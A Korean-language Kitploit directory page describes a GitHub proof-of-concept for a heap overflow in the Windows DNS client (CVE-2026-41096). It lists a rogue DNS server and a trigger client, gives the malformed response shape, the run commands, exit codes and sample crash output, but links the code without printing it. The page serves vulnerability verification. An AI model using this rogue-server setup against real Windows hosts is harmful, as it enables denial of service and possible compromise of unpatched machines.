Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41096 — CVE-2026-41096에 대한 개념 증명 익스플로잇: Windows DNS 클라이언트의 DnsRawTruncateMessageForUdp()에서 발생하는 힙 오버플로. 취약점 확인을 위한 악성 DNS 서버와 트리거 클라이언트를 포함합니다. | Kitploit
도구/GitHubGitHub/m0n1x90/cve-2026-41096
Payload GenerationVulnerability AnalysisExploitationFuzzingDNS AnalysisBinary Exploitation
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

CVE-2026-41096에 대한 개념 증명 익스플로잇: Windows DNS 클라이언트의 DnsRawTruncateMessageForUdp()에서 발생하는 힙 오버플로. 취약점 확인을 위한 악성 DNS 서버와 트리거 클라이언트를 포함합니다.

저장소 보기
3233개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41096 - 크래시 PoC

DnsRawTruncateMessageForUdp()(dnsapi.dll)의 힙 오버플로입니다. QDCOUNT=0과 대용량 OPT 레코드가 포함된 조작된 DNS 응답은 truncation 로직이 대상 포인터를 잘못 계산할 때 604바이트 힙 오버플로를 유발합니다.

MSRC 보안 권고: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

구성 요소

파일설명
rogue_dns_server.py로그 DNS 서버(Python 3). 모든 쿼리에 QDCOUNT=0 + OPT 응답(623바이트)으로 응답합니다.
trigger_client.c트리거 클라이언트(C/Win32). 로그 서버를 대상으로 DnsQueryRaw를 호출합니다. SetUnhandledExceptionFilter를 통해 크래시를 포착합니다.

요구 사항

공격자(로그 서버):

  • Python 3
  • Root/관리자 권한(포트 53)

피해자(트리거 클라이언트):

  • DnsCache 서비스가 포함된 Windows OS(DnsQueryRaw 필요)
  • 취약한 버전의 dnsapi.dll
  • Visual Studio / Windows SDK(빌드용)

사용법

1. 로그 서버 시작:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. 트리거 클라이언트 빌드 및 실행:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (선택 사항) 결정적 크래시를 위해 Page Heap 활성화:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

종료 코드

코드의미
0시스템이 패치됨(DNS_ERROR_BAD_PACKET이 정상적으로 반환됨)
1오류(DnsQueryRaw를 찾을 수 없음, 네트워크 문제 등)
2크래시 감지(힙 오버플로 확인됨)

출력 예시

취약(Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

취약(Page Heap 없음):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

패치됨:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
도구 다운로드